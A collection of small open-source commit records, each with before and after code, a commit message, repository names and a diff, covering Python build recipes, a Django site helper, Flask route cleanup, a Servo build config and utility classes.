raise xyz.UsageError("Invalid target ({}) for {}".format(builder.target, self.pkg_name))
def configure(self, builder, config):
builder.cross_configure('--disable-nls', '--enable-lto', '--enable-ld=yes', '--without-zlib',
config=config)
def install(self, builder, config):
super().install(builder, config)
# For some reason binutils plonks libiberty.a in the output directory
libdir = builder.j('{install_dir_abs}', config['eprefix'][1:], 'lib', config=config)
if os.path.exists(libdir):
shutil.rmtree(libdir)
# For now we strip the man pages.
# man pages created on different systems are (for no good reason) different!
man_dir = builder.j('{install_dir}', config['prefix'][1:], 'share', 'man', config=config)
shutil.rmtree(man_dir)
rules = Binutils()
|
import xyz
import os
import shutil
class Binutils(xyz.BuildProtocol):
pkg_name = 'binutils'
supported_targets = ['arm-none-eabi']
def check(self, builder):
if builder.target not in self.supported_targets:
raise xyz.UsageError("Invalid target ({}) for {}".format(builder.target, self.pkg_name))
def configure(self, builder, config):
builder.cross_configure('--disable-nls', '--enable-lto', '--enable-ld=yes', '--without-zlib',
config=config)
def install(self, builder, config):
super().install(builder, config)
# For some reason binutils plonks libiberty.a in the output directory
libdir = builder.j('{install_dir_abs}', config['eprefix'][1:], 'lib', config=config)
if os.path.exists(libdir):
shutil.rmtree(libdir)
# For now we strip the man pages.
# man pages created on different systems are (for no good reason) different!
man_dir = builder.j('{install_dir}', config['prefix'][1:], 'share', 'man', config=config)
shutil.rmtree(man_dir)
# For now we strip the info pages too.
# Different versino of texinfo product different output!
info_dir = builder.j('{install_dir}', config['prefix'][1:], 'share', 'info', config=config)
shutil.rmtree(info_dir)
rules = Binutils()
|
Remove info dirs (for now)
|
Remove info dirs (for now)
|
Python
|
mit
|
BreakawayConsulting/xyz
|
---
+++
@@ -25,5 +25,10 @@
man_dir = builder.j('{install_dir}', config['prefix'][1:], 'share', 'man', config=config)
shutil.rmtree(man_dir)
+ # For now we strip the info pages too.
+ # Different versino of texinfo product different output!
+ info_dir = builder.j('{install_dir}', config['prefix'][1:], 'share', 'info', config=config)
+ shutil.rmtree(info_dir)
+
rules = Binutils()
|
86f8ccedae6bf671a88aa342cf993bab55057406
|
api/models.py
|
api/models.py
|
class MessageModel:
def __init__(self, message, duration, creation_date, message_category):
# We will automatically generate the new id
self.id = 0
self.message = message
self.duration = duration
self.creation_date = creation_date
self.message_category = message_category
self.printed_times = 0
self.printed_once = False
class AccountModel:
def __init__(self, account_type, account_number, name, first_name, address, birthdate):
# We will automatically generate the new id
self.id = 0
self.type = account_type
self.number = account_number
self.name = name
self.first_name = first_name
self.address = address
self.birthdate = birthdate
#We will automatically generate next 2 parameters based on client address.
self.longitude = 0;
self.latitude = 0;
|
class AccountModel:
def __init__(self, account_type, account_number, name, first_name, address, birthdate):
# We will automatically generate the new id
self.id = 0
self.type = account_type
self.number = account_number
self.name = name
self.first_name = first_name
self.address = address
self.birthdate = birthdate
#We will automatically generate next 2 parameters based on client address.
self.longitude = 0;
self.latitude = 0;
|
Remove message model as unused
|
Remove message model as unused
No need in test class as soon as we have working api
|
Python
|
mit
|
candidate48661/BEA
|
---
+++
@@ -1,15 +1,3 @@
-class MessageModel:
- def __init__(self, message, duration, creation_date, message_category):
- # We will automatically generate the new id
- self.id = 0
- self.message = message
- self.duration = duration
- self.creation_date = creation_date
- self.message_category = message_category
- self.printed_times = 0
- self.printed_once = False
-
-
class AccountModel:
def __init__(self, account_type, account_number, name, first_name, address, birthdate):
# We will automatically generate the new id
|
5490939f5b94b15c154e027abcd295f14ac17a45
|
src/config/site_utils.py
|
src/config/site_utils.py
|
from django.contrib.sites.models import Site
def set_site_info(domain='datahub-local.mit.edu', name='MIT DataHub'):
site = Site.objects.get_current()
if site.domain != domain:
site.domain = domain
site.name = name
site.save()
|
from django.contrib.sites.models import Site
from django.db.utils import ProgrammingError
def set_site_info(domain='datahub-local.mit.edu', name='MIT DataHub'):
try:
site = Site.objects.get_current()
if site.domain != domain:
site.domain = domain
site.name = name
site.save()
except ProgrammingError:
pass
|
Make sure initial migration works for new installs.
|
Make sure initial migration works for new installs.
Bootstrapping the Site model entirely in settings isn't great.
|
Python
|
mit
|
datahuborg/datahub,datahuborg/datahub,anantb/datahub,RogerTangos/datahub-stub,anantb/datahub,RogerTangos/datahub-stub,datahuborg/datahub,anantb/datahub,RogerTangos/datahub-stub,RogerTangos/datahub-stub,RogerTangos/datahub-stub,datahuborg/datahub,datahuborg/datahub,anantb/datahub,anantb/datahub,RogerTangos/datahub-stub,datahuborg/datahub,anantb/datahub,RogerTangos/datahub-stub,datahuborg/datahub,anantb/datahub
|
---
+++
@@ -1,9 +1,13 @@
from django.contrib.sites.models import Site
+from django.db.utils import ProgrammingError
def set_site_info(domain='datahub-local.mit.edu', name='MIT DataHub'):
- site = Site.objects.get_current()
- if site.domain != domain:
- site.domain = domain
- site.name = name
- site.save()
+ try:
+ site = Site.objects.get_current()
+ if site.domain != domain:
+ site.domain = domain
+ site.name = name
+ site.save()
+ except ProgrammingError:
+ pass
|
1b3ec35857a8eff88b8984c83564e18a25ff081e
|
app/routes.py
|
app/routes.py
|
from flask import request, jsonify, session, g
import numpy as np
from DatasetCreation import ConstructDataset
from . import app
from . import firebase
from sklearn.ensemble import RandomForestClassifier
from sklearn import preprocessing
from sklearn.cross_validation import cross_val_score
@app.route("/", methods=["GET"])
def index():
response = firebase.get("/", None)
response = response or {}
datapoints, labels = ConstructDataset(response)
print len(datapoints)
print len(labels)
# print datapoints[ labels == True ]
print datapoints[10]
#enc = preprocessing.OneHotEncoder()
#print enc.fit(datapoints)
#clf = RandomForestClassifier(n_estimators=10, min_samples_split=1)
#clf = clf.fit(datapoints, labels)
#scores = cross_val_score(clf, datapoints, labels)
#scores.mean()
#clf = DecisionTreeClassifier(max_depth=None, min_samples_split=1, random_state=0)
#scores = cross_val_score(clf, datapoints, labels)
#scores.mean()
return jsonify(response)
|
from flask import jsonify
from . import app
from . import firebase
@app.route("/", methods=["GET"])
def index():
response = firebase.get("/", None)
response = response or {}
return jsonify(response)
|
Remove commented code and unused imports
|
Remove commented code and unused imports
|
Python
|
mit
|
MachineLearningProject/flight-delay-prediction,MachineLearningProject/flight-delay-prediction,MachineLearningProject/flight-delay-prediction
|
---
+++
@@ -1,13 +1,7 @@
-from flask import request, jsonify, session, g
-import numpy as np
-from DatasetCreation import ConstructDataset
+from flask import jsonify
from . import app
from . import firebase
-
-from sklearn.ensemble import RandomForestClassifier
-from sklearn import preprocessing
-from sklearn.cross_validation import cross_val_score
@app.route("/", methods=["GET"])
@@ -15,24 +9,4 @@
response = firebase.get("/", None)
response = response or {}
- datapoints, labels = ConstructDataset(response)
- print len(datapoints)
- print len(labels)
-
- # print datapoints[ labels == True ]
- print datapoints[10]
-
- #enc = preprocessing.OneHotEncoder()
- #print enc.fit(datapoints)
-
- #clf = RandomForestClassifier(n_estimators=10, min_samples_split=1)
- #clf = clf.fit(datapoints, labels)
-
- #scores = cross_val_score(clf, datapoints, labels)
- #scores.mean()
-
- #clf = DecisionTreeClassifier(max_depth=None, min_samples_split=1, random_state=0)
- #scores = cross_val_score(clf, datapoints, labels)
- #scores.mean()
-
return jsonify(response)
|
37bcc2ffcdf17108d381842ff4b2427a52bbae52
|
bld/linux.py
|
bld/linux.py
|
config = {
'mock_target': 'mozilla-centos6-x86_64',
'mock_packages': ['freetype-devel', 'fontconfig-devel', 'glib2-devel', 'autoconf213', 'git', 'make', 'libX11-devel', 'mesa-libGL-devel', 'freeglut-devel',
'xorg-x11-server-devel', 'libXrandr-devel', 'libXi-devel', 'libpng-devel', 'expat-devel'],
'mock_files': [('/home/servobld/.ssh', '/home/mock_mozilla/.ssh')],
'concurrency': 6,
'add_actions': ['setup-mock'],
}
|
config = {
'mock_target': 'mozilla-centos6-x86_64',
'mock_packages': ['freetype-devel', 'fontconfig-devel', 'glib2-devel', 'autoconf213', 'git', 'make', 'libX11-devel', 'mesa-libGL-devel', 'freeglut-devel',
'xorg-x11-server-devel', 'libXrandr-devel', 'libXi-devel', 'libpng-devel', 'expat-devel', 'gperf'],
'mock_files': [('/home/servobld/.ssh', '/home/mock_mozilla/.ssh')],
'concurrency': 6,
'add_actions': ['setup-mock'],
}
|
Install gperf on Linux builders
|
Install gperf on Linux builders
|
Python
|
mpl-2.0
|
SimonSapin/servo,huonw/servo,jdramani/servo,saratang/servo,luniv/servo,paulrouget/servo,dati91/servo,tafia/servo,cbrewster/servo,tschneidereit/servo,wartman4404/servo,kindersung/servo,mbrubeck/servo,juzer10/servo,mrobinson/servo,akosel/servo,rentongzhang/servo,peterjoel/servo,mrobinson/servo,froydnj/servo,youprofit/servo,jimberlage/servo,saneyuki/servo,AnthonyBroadCrawford/servo,Adenilson/prototype-viewing-distance,juzer10/servo,zentner-kyle/servo,indykish/servo,g-k/servo,mbrubeck/servo,dhananjay92/servo,GreenRecycleBin/servo,steveklabnik/servo,peterjoel/servo,jimberlage/servo,GreenRecycleBin/servo,juzer10/servo,tempbottle/servo,tempbottle/servo,DominoTree/servo,akosel/servo,CJ8664/servo,mrobinson/servo,peterjoel/servo,caldwell/servo,g-k/servo,emilio/servo,mukilan/servo,nrc/servo,avadacatavra/servo,splav/servo,emilio/servo,wpgallih/servo,walac/servo,Shraddha512/servo,g-k/servo,dhananjay92/servo,caldwell/servo,bfrohs/servo,shrenikgala/servo,CJ8664/servo,akosel/servo,eddyb/servo,tempbottle/servo,s142857/servo,dsandeephegde/servo,bjwbell/servo,mbrubeck/servo,boghison/servo,fiji-flo/servo,jdramani/servo,mattnenterprise/servo,seanmonstar/servo,runarberg/servo,eddyb/servo,dhananjay92/servo,mukilan/servo,samfoo/servo,tempbottle/servo,AnthonyBroadCrawford/servo,dsandeephegde/servo,thiagopnts/servo,emilio/servo,jdramani/servo,KiChjang/servo,ryancanhelpyou/servo,saratang/servo,jdramani/servo,steveklabnik/servo,larsbergstrom/servo,pgonda/servo,emilio/servo,Adenilson/prototype-viewing-distance,avadacatavra/servo,paulrouget/servo,evilpie/servo,upsuper/servo,nick-thompson/servo,saneyuki/servo,Shraddha512/servo,paulrouget/servo,zentner-kyle/servo,snf/servo,anthgur/servo,dvberkel/servo,jgraham/servo,eddyb/servo,cbrewster/servo,steveklabnik/servo,boghison/servo,canaltinova/servo,zentner-kyle/servo,dvberkel/servo,echochamber/servo,RenaudParis/servo,jdramani/servo,pyfisch/servo,rentongzhang/servo,chotchki/servo,szeged/servo,emilio/servo,vks/servo,sadmansk/servo,GreenRecycleBin/servo,k
indersung/servo,wpgallih/servo,deokjinkim/servo,avadacatavra/servo,luniv/servo,mt2d2/servo,cbrewster/servo,splav/servo,cbrewster/servo,wartman4404/servo,s142857/servo,huonw/servo,A-deLuna/servo,Adenilson/prototype-viewing-distance,upsuper/servo,srbhklkrn/SERVOENGINE,juzer10/servo,meh/servo,ruud-v-a/servo,walac/servo,saneyuki/servo,chotchki/servo,rentongzhang/servo,RenaudParis/servo,notriddle/servo,codemac/servo,fiji-flo/servo,saneyuki/servo,saratang/servo,jgraham/servo,GyrosOfWar/servo,akosel/servo,meh/servo,DominoTree/servo,evilpie/servo,nerith/servo,DominoTree/servo,AnthonyBroadCrawford/servo,boghison/servo,indykish/servo,vks/servo,paulrouget/servo,jimberlage/servo,meh/servo,saneyuki/servo,karlito40/servo,rnestler/servo,jimberlage/servo,KiChjang/servo,emilio/servo,A-deLuna/servo,peterjoel/servo,codemac/servo,Adenilson/prototype-viewing-distance,tschneidereit/servo,codemac/servo,chotchki/servo,saratang/servo,meh/servo,splav/servo,indykish/servo,samfoo/servo,bjwbell/servo,anthgur/servo,nrc/servo,fiji-flo/servo,walac/servo,brendandahl/servo,walac/servo,jlegendary/servo,wartman4404/servo,dagnir/servo,jgraham/servo,notriddle/servo,aweinstock314/servo,luniv/servo,mattnenterprise/servo,steveklabnik/servo,wpgallih/servo,youprofit/servo,chotchki/servo,SimonSapin/servo,pgonda/servo,bfrohs/servo,michaelwu/servo,A-deLuna/servo,kindersung/servo,DominoTree/servo,mt2d2/servo,g-k/servo,cbrewster/servo,mrobinson/servo,dati91/servo,froydnj/servo,dati91/servo,aidanhs/servo,brendandahl/servo,A-deLuna/servo,dhananjay92/servo,thiagopnts/servo,SimonSapin/servo,GyrosOfWar/servo,KiChjang/servo,s142857/servo,tafia/servo,echochamber/servo,dsandeephegde/servo,michaelwu/servo,g-k/servo,SimonSapin/servo,bjwbell/servo,aidanhs/servo,runarberg/servo,szeged/servo,rentongzhang/servo,echochamber/servo,aidanhs/servo,mbrubeck/servo,shrenikgala/servo,michaelwu/servo,runarberg/servo,mdibaiee/servo,cbrewster/servo,GyrosOfWar/servo,youprofit/servo,samfoo/servo,mattnenterprise/servo,fiji-flo/servo,zhangjun
lei26/servo,huonw/servo,WriterOfAlicrow/servo,brendandahl/servo,brendandahl/servo,KiChjang/servo,jgraham/servo,nick-thompson/servo,nerith/servo,karlito40/servo,echochamber/servo,rnestler/servo,anthgur/servo,boghison/servo,avadacatavra/servo,peterjoel/servo,mattnenterprise/servo,notriddle/servo,codemac/servo,pgonda/servo,shrenikgala/servo,aidanhs/servo,A-deLuna/servo,larsbergstrom/servo,deokjinkim/servo,notriddle/servo,dmarcos/servo,A-deLuna/servo,akosel/servo,shrenikgala/servo,luniv/servo,Adenilson/prototype-viewing-distance,paulrouget/servo,zentner-kyle/servo,rnestler/servo,ConnorGBrewster/servo,caldwell/servo,thiagopnts/servo,jlegendary/servo,mrobinson/servo,dhananjay92/servo,canaltinova/servo,upsuper/servo,WriterOfAlicrow/servo,vks/servo,pyfisch/servo,mbrubeck/servo,hyowon/servo,vks/servo,ruud-v-a/servo,shrenikgala/servo,shrenikgala/servo,mattnenterprise/servo,srbhklkrn/SERVOENGINE,bjwbell/servo,snf/servo,zhangjunlei26/servo,dvberkel/servo,CJ8664/servo,sadmansk/servo,brendandahl/servo,avadacatavra/servo,ryancanhelpyou/servo,dati91/servo,tempbottle/servo,evilpie/servo,thiagopnts/servo,codemac/servo,nick-thompson/servo,splav/servo,eddyb/servo,saneyuki/servo,bfrohs/servo,indykish/servo,steveklabnik/servo,samfoo/servo,sadmansk/servo,sadmansk/servo,KiChjang/servo,tempbottle/servo,ConnorGBrewster/servo,caldwell/servo,WriterOfAlicrow/servo,ConnorGBrewster/servo,jgraham/servo,fiji-flo/servo,AnthonyBroadCrawford/servo,s142857/servo,ryancanhelpyou/servo,nerith/servo,sadmansk/servo,Shraddha512/servo,g-k/servo,rixrix/servo,kindersung/servo,nnethercote/servo,kindersung/servo,dagnir/servo,karlito40/servo,CJ8664/servo,thiagopnts/servo,aweinstock314/servo,nnethercote/servo,emilio/servo,nnethercote/servo,karlito40/servo,karlito40/servo,indykish/servo,kindersung/servo,mbrubeck/servo,larsbergstrom/servo,ConnorGBrewster/servo,dagnir/servo,peterjoel/servo,CJ8664/servo,zhangjunlei26/servo,nrc/servo,aidanhs/servo,pyecs/servo,eddyb/servo,srbhklkrn/SERVOENGINE,thiagopnts/servo,saratang/s
ervo,paulrouget/servo,echochamber/servo,chotchki/servo,karlito40/servo,jimberlage/servo,seanmonstar/servo,rixrix/servo,Shraddha512/servo,chotchki/servo,runarberg/servo,mukilan/servo,zhangjunlei26/servo,larsbergstrom/servo,saneyuki/servo,ryancanhelpyou/servo,tafia/servo,hyowon/servo,seanmonstar/servo,DominoTree/servo,saneyuki/servo,boghison/servo,aweinstock314/servo,dmarcos/servo,indykish/servo,jgraham/servo,ryancanhelpyou/servo,larsbergstrom/servo,aidanhs/servo,tschneidereit/servo,j3parker/servo,srbhklkrn/SERVOENGINE,fiji-flo/servo,emilio/servo,pyfisch/servo,samfoo/servo,mattnenterprise/servo,hyowon/servo,mukilan/servo,rixrix/servo,nnethercote/servo,larsbergstrom/servo,paulrouget/servo,RenaudParis/servo,pyfisch/servo,GreenRecycleBin/servo,luniv/servo,froydnj/servo,zhangjunlei26/servo,dmarcos/servo,szeged/servo,wartman4404/servo,tafia/servo,tschneidereit/servo,canaltinova/servo,saratang/servo,samfoo/servo,wartman4404/servo,notriddle/servo,evilpie/servo,AnthonyBroadCrawford/servo,canaltinova/servo,deokjinkim/servo,zhangjunlei26/servo,KiChjang/servo,rentongzhang/servo,KiChjang/servo,zentner-kyle/servo,saneyuki/servo,WriterOfAlicrow/servo,notriddle/servo,upsuper/servo,GreenRecycleBin/servo,mdibaiee/servo,WriterOfAlicrow/servo,pyecs/servo,sadmansk/servo,indykish/servo,CJ8664/servo,mattnenterprise/servo,j3parker/servo,seanmonstar/servo,tschneidereit/servo,cbrewster/servo,akosel/servo,GyrosOfWar/servo,jdramani/servo,nrc/servo,dsandeephegde/servo,youprofit/servo,dagnir/servo,emilio/servo,paulrouget/servo,nick-thompson/servo,emilio/servo,froydnj/servo,mt2d2/servo,steveklabnik/servo,nerith/servo,wpgallih/servo,tafia/servo,froydnj/servo,KiChjang/servo,evilpie/servo,bjwbell/servo,caldwell/servo,szeged/servo,splav/servo,walac/servo,mbrubeck/servo,cbrewster/servo,dhananjay92/servo,pyecs/servo,nnethercote/servo,dsandeephegde/servo,caldwell/servo,ruud-v-a/servo,wartman4404/servo,szeged/servo,zentner-kyle/servo,ConnorGBrewster/servo,nerith/servo,pyfisch/servo,rixrix/servo,jimberlage
/servo,evilpie/servo,bjwbell/servo,szeged/servo,pgonda/servo,thiagopnts/servo,vks/servo,youprofit/servo,nick-thompson/servo,j3parker/servo,mt2d2/servo,pgonda/servo,samfoo/servo,s142857/servo,jlegendary/servo,eddyb/servo,dvberkel/servo,mdibaiee/servo,jgraham/servo,larsbergstrom/servo,paulrouget/servo,CJ8664/servo,GreenRecycleBin/servo,huonw/servo,GreenRecycleBin/servo,dagnir/servo,nick-thompson/servo,nnethercote/servo,fiji-flo/servo,michaelwu/servo,walac/servo,vks/servo,caldwell/servo,thiagopnts/servo,kindersung/servo,GyrosOfWar/servo,evilpie/servo,splav/servo,rnestler/servo,GreenRecycleBin/servo,pyfisch/servo,ConnorGBrewster/servo,KiChjang/servo,canaltinova/servo,canaltinova/servo,dmarcos/servo,j3parker/servo,wpgallih/servo,mukilan/servo,peterjoel/servo,avadacatavra/servo,jlegendary/servo,Shraddha512/servo,j3parker/servo,boghison/servo,DominoTree/servo,mdibaiee/servo,peterjoel/servo,mt2d2/servo,RenaudParis/servo,boghison/servo,Adenilson/prototype-viewing-distance,hyowon/servo,mdibaiee/servo,jimberlage/servo,deokjinkim/servo,canaltinova/servo,brendandahl/servo,wpgallih/servo,akosel/servo,tschneidereit/servo,mattnenterprise/servo,hyowon/servo,juzer10/servo,bfrohs/servo,rnestler/servo,dati91/servo,RenaudParis/servo,szeged/servo,nnethercote/servo,runarberg/servo,bfrohs/servo,hyowon/servo,aweinstock314/servo,luniv/servo,anthgur/servo,huonw/servo,nrc/servo,deokjinkim/servo,dati91/servo,rixrix/servo,pyecs/servo,CJ8664/servo,dsandeephegde/servo,mt2d2/servo,WriterOfAlicrow/servo,anthgur/servo,notriddle/servo,A-deLuna/servo,dagnir/servo,dmarcos/servo,RenaudParis/servo,seanmonstar/servo,AnthonyBroadCrawford/servo,mdibaiee/servo,youprofit/servo,echochamber/servo,notriddle/servo,tafia/servo,dati91/servo,jimberlage/servo,wpgallih/servo,sadmansk/servo,brendandahl/servo,WriterOfAlicrow/servo,runarberg/servo,ConnorGBrewster/servo,huonw/servo,larsbergstrom/servo,ruud-v-a/servo,zhangjunlei26/servo,splav/servo,jimberlage/servo,evilpie/servo,ryancanhelpyou/servo,srbhklkrn/SERVOENGINE,no
triddle/servo,deokjinkim/servo,ConnorGBrewster/servo,Shraddha512/servo,upsuper/servo,j3parker/servo,pyecs/servo,deokjinkim/servo,snf/servo,rixrix/servo,nerith/servo,ryancanhelpyou/servo,froydnj/servo,anthgur/servo,nnethercote/servo,evilpie/servo,shrenikgala/servo,zhangjunlei26/servo,AnthonyBroadCrawford/servo,nnethercote/servo,dsandeephegde/servo,s142857/servo,rnestler/servo,huonw/servo,wpgallih/servo,Shraddha512/servo,snf/servo,dvberkel/servo,pyfisch/servo,anthgur/servo,s142857/servo,SimonSapin/servo,jlegendary/servo,steveklabnik/servo,rixrix/servo,RenaudParis/servo,rixrix/servo,tschneidereit/servo,nerith/servo,nrc/servo,upsuper/servo,nnethercote/servo,dagnir/servo,hyowon/servo,dhananjay92/servo,indykish/servo,upsuper/servo,szeged/servo,canaltinova/servo,snf/servo,codemac/servo,echochamber/servo,indykish/servo,j3parker/servo,mrobinson/servo,tempbottle/servo,upsuper/servo,GreenRecycleBin/servo,eddyb/servo,mukilan/servo,dvberkel/servo,pyecs/servo,jlegendary/servo,zhangjunlei26/servo,nick-thompson/servo,GyrosOfWar/servo,paulrouget/servo,peterjoel/servo,g-k/servo,ruud-v-a/servo,karlito40/servo,juzer10/servo,rixrix/servo,rentongzhang/servo,wartman4404/servo,mt2d2/servo,GyrosOfWar/servo,dmarcos/servo,saratang/servo,pgonda/servo,srbhklkrn/SERVOENGINE,seanmonstar/servo,saneyuki/servo,rnestler/servo,dvberkel/servo,DominoTree/servo,eddyb/servo,meh/servo,srbhklkrn/SERVOENGINE,larsbergstrom/servo,SimonSapin/servo,snf/servo,fiji-flo/servo,ruud-v-a/servo,sadmansk/servo,splav/servo,snf/servo,youprofit/servo,aweinstock314/servo,larsbergstrom/servo,szeged/servo,notriddle/servo,splav/servo,walac/servo,aidanhs/servo,dmarcos/servo,avadacatavra/servo,dsandeephegde/servo,vks/servo,bfrohs/servo,peterjoel/servo,pyecs/servo,nrc/servo,codemac/servo,pyfisch/servo,rentongzhang/servo,pyfisch/servo,dati91/servo,rnestler/servo,anthgur/servo,mdibaiee/servo,pyfisch/servo,meh/servo,SimonSapin/servo,splav/servo,SimonSapin/servo,bjwbell/servo,michaelwu/servo,aweinstock314/servo,avadacatavra/servo,mic
haelwu/servo,Adenilson/prototype-viewing-distance,juzer10/servo,runarberg/servo,DominoTree/servo,jlegendary/servo,jdramani/servo,luniv/servo,DominoTree/servo,pgonda/servo,aweinstock314/servo,zentner-kyle/servo,tafia/servo,meh/servo,KiChjang/servo,szeged/servo,wpgallih/servo,mbrubeck/servo,DominoTree/servo
|
---
+++
@@ -1,7 +1,7 @@
config = {
'mock_target': 'mozilla-centos6-x86_64',
'mock_packages': ['freetype-devel', 'fontconfig-devel', 'glib2-devel', 'autoconf213', 'git', 'make', 'libX11-devel', 'mesa-libGL-devel', 'freeglut-devel',
- 'xorg-x11-server-devel', 'libXrandr-devel', 'libXi-devel', 'libpng-devel', 'expat-devel'],
+ 'xorg-x11-server-devel', 'libXrandr-devel', 'libXi-devel', 'libpng-devel', 'expat-devel', 'gperf'],
'mock_files': [('/home/servobld/.ssh', '/home/mock_mozilla/.ssh')],
'concurrency': 6,
'add_actions': ['setup-mock'],
|
3e105facfb6983a10727ae40e6c239d825460b13
|
demo/IDL/config.py
|
demo/IDL/config.py
|
# Config file for IDL demos
# The IDLs all have comments in //. style
from Synopsis.Config import Base
class Config (Base):
class Parser:
class IDL (Base.Parser.IDL):
include_path = ['.']
modules = {
'IDL':IDL,
}
class Linker:
class Linker (Base.Linker.Linker):
comment_processors = ['ssd']
modules = {
'Linker':Linker,
}
class Formatter:
class HTML (Base.Formatter.HTML):
stylesheet_file = '../html.css'
def __init__(self, argv):
"force style to be synopsis"
argv['style'] = 'synopsis'
Base.Formatter.HTML.__init__(self, argv)
modules = Base.Formatter.modules
modules['HTML'] = HTML
|
# Config file for IDL demos
# The IDLs all have comments in //. style
from Synopsis.Config import Base
class Config (Base):
class Parser:
class IDL (Base.Parser.IDL):
include_path = ['.']
modules = {
'IDL':IDL,
}
class Linker:
class Linker (Base.Linker.Linker):
comment_processors = ['ssd']
modules = {
'Linker':Linker,
}
class Formatter:
class HTML (Base.Formatter.HTML):
stylesheet_file = '../html.css'
modules = Base.Formatter.modules
modules['HTML'] = HTML
|
Remove __init__ since dont need to force style anymore
|
Remove __init__ since dont need to force style anymore
|
Python
|
lgpl-2.1
|
stefanseefeld/synopsis,stefanseefeld/synopsis,stefanseefeld/synopsis,stefanseefeld/synopsis,stefanseefeld/synopsis,stefanseefeld/synopsis
|
---
+++
@@ -21,10 +21,6 @@
class Formatter:
class HTML (Base.Formatter.HTML):
stylesheet_file = '../html.css'
- def __init__(self, argv):
- "force style to be synopsis"
- argv['style'] = 'synopsis'
- Base.Formatter.HTML.__init__(self, argv)
modules = Base.Formatter.modules
modules['HTML'] = HTML
|
8c704a01aa935f8fea1cb88683853dffa0ee5464
|
src/estimate_probs.py
|
src/estimate_probs.py
|
# from the __future__ package, import division
# to allow float division
from __future__ import division
def estimate_probs(trigram_counts_dict):
'''
# Estimates probabilities of trigrams using
# trigram_counts_dict and returns a new dictionary
# with the probabilities.
'''
trigram_probs_dict = dict.fromkeys(trigram_counts_dict)
sum_counts = sum(trigram_counts_dict.values())
probs = []
for i in trigram_counts_dict.values():
i = i / sum_counts
probs.append(i)
i = 0
for key in trigram_probs_dict:
trigram_probs_dict[key] = probs[i]
i += 1
return trigram_probs_dict
#--------------------------------------------------------#
'''
# This is a test string
'''
if __name__ == '__main__':
s = {
' a ': 1, 's i': 1, 'his': 1, 'str': 1, 's a': 1,
' is': 1, 'ing': 1, ' st': 1, 'rin': 1, 'tri': 1, 'thi': 1,
'a s': 1, 'is ': 2
}
print estimate_probs(s)
|
#! /usr/bin/python2
# from the __future__ package, import division
# to allow float division
from __future__ import division
def estimate_probs(trigram_counts_dict):
'''
# Estimates probabilities of trigrams using
# trigram_counts_dict and returns a new dictionary
# with the probabilities.
'''
trigram_probs_dict = dict.fromkeys(trigram_counts_dict)
sum_counts = sum(trigram_counts_dict.values())
probs = []
for i in trigram_counts_dict.values():
i = i / sum_counts
probs.append(i)
i = 0
for key in trigram_probs_dict:
trigram_probs_dict[key] = probs[i]
i += 1
return trigram_probs_dict
#--------------------------------------------------------#
'''
# This is a test string
'''
if __name__ == '__main__':
s = {
' a ': 1, 's i': 1, 'his': 1, 'str': 1, 's a': 1,
' is': 1, 'ing': 1, ' st': 1, 'rin': 1, 'tri': 1, 'thi': 1,
'a s': 1, 'is ': 2
}
print estimate_probs(s)
|
Make sure we use python2
|
Make sure we use python2
|
Python
|
unlicense
|
jvasilakes/language_detector,jvasilakes/language_detector
|
---
+++
@@ -1,3 +1,5 @@
+#! /usr/bin/python2
+
# from the __future__ package, import division
# to allow float division
|
af14c06b0a8443f28d92c6eee884d125b2504b00
|
examples/loader_spin.py
|
examples/loader_spin.py
|
# -*- coding: utf-8 -*-
"""Example for spinner that looks like loader
"""
from __future__ import unicode_literals, absolute_import, print_function
import os
import time
import random
os.sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from halo import Halo
spinner = Halo(text='Downloading dataset.zip', spinner='dots')
try:
spinner.start()
for i in xrange(100):
spinner.text = '{0}% Downloaded dataset.zip'.format(i)
time.sleep(random.random())
spinner.succeed('Downloaded dataset.zip')
except (KeyboardInterrupt, SystemExit):
spinner.stop()
|
# -*- coding: utf-8 -*-
"""Example for spinner that looks like loader
"""
from __future__ import unicode_literals, absolute_import, print_function
import os
import time
import random
os.sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from halo import Halo
spinner = Halo(text='Downloading dataset.zip', spinner='dots')
try:
spinner.start()
for i in range(100):
spinner.text = '{0}% Downloaded dataset.zip'.format(i)
time.sleep(random.random())
spinner.succeed('Downloaded dataset.zip')
except (KeyboardInterrupt, SystemExit):
spinner.stop()
|
Fix xrange to range for supporting python3
|
Fix xrange to range for supporting python3
|
Python
|
mit
|
manrajgrover/halo,ManrajGrover/halo
|
---
+++
@@ -14,7 +14,7 @@
try:
spinner.start()
- for i in xrange(100):
+ for i in range(100):
spinner.text = '{0}% Downloaded dataset.zip'.format(i)
time.sleep(random.random())
spinner.succeed('Downloaded dataset.zip')
|
7fc4a8d2a12100bae9b2ddb5c0b08fbfd94091f2
|
dataproperty/_container.py
|
dataproperty/_container.py
|
# encoding: utf-8
'''
@author: Tsuyoshi Hombashi
'''
class MinMaxContainer(object):
@property
def min_value(self):
return self.__min_value
@property
def max_value(self):
return self.__max_value
def __init__(self, value_list=[]):
self.__min_value = None
self.__max_value = None
for value in value_list:
self.update(value)
def diff(self):
try:
return self.max_value - self.min_value
except TypeError:
return float("nan")
def mean(self):
try:
return (self.max_value + self.min_value) * 0.5
except TypeError:
return float("nan")
def update(self, value):
if value is None:
return
if self.__min_value is None:
self.__min_value = value
else:
self.__min_value = min(self.__min_value, value)
if self.__max_value is None:
self.__max_value = value
else:
self.__max_value = max(self.__max_value, value)
|
# encoding: utf-8
'''
@author: Tsuyoshi Hombashi
'''
class MinMaxContainer(object):
@property
def min_value(self):
return self.__min_value
@property
def max_value(self):
return self.__max_value
def __init__(self, value_list=[]):
self.__min_value = None
self.__max_value = None
for value in value_list:
self.update(value)
def __eq__(self, other):
return all([
self.min_value == other.min_value,
self.max_value == other.max_value,
])
def __ne__(self, other):
return any([
self.min_value != other.min_value,
self.max_value != other.max_value,
])
def __contains__(self, x):
return self.min_value <= x <= self.max_value
def diff(self):
try:
return self.max_value - self.min_value
except TypeError:
return float("nan")
def mean(self):
try:
return (self.max_value + self.min_value) * 0.5
except TypeError:
return float("nan")
def update(self, value):
if value is None:
return
if self.__min_value is None:
self.__min_value = value
else:
self.__min_value = min(self.__min_value, value)
if self.__max_value is None:
self.__max_value = value
else:
self.__max_value = max(self.__max_value, value)
|
Add __eq__, __ne__, __contains__ methods
|
Add __eq__, __ne__, __contains__ methods
|
Python
|
mit
|
thombashi/DataProperty
|
---
+++
@@ -21,6 +21,21 @@
for value in value_list:
self.update(value)
+
+ def __eq__(self, other):
+ return all([
+ self.min_value == other.min_value,
+ self.max_value == other.max_value,
+ ])
+
+ def __ne__(self, other):
+ return any([
